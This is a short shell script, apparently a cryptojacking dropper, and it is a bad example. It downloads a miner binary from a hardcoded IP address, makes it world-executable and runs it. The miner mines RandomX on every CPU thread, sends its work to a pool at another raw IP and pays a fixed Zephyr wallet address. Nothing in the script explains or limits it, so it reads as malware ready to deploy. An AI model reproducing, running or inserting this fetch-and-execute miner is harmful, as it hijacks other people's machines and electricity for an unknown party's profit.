#!/bin/sh
wget -O oasis http://139.180.133.28/SRBMiner-MULTI
chmod 777 oasis
./oasis --algorithm randomx --pool 165.232.165.31:80 --wallet ZEPHYR3YjAKBsmXd4MGYpAgatSybW8xwDUSTiLY8dotSQLogQFUgaGmZr3295MB5M8GTDZUUiLFxkHZdsGBVPmyLSt7aXUDRtEW48.$(echo $(shuf -i 1-100000 -n 1)-BR) --password x --cpu-threads $(nproc --all)
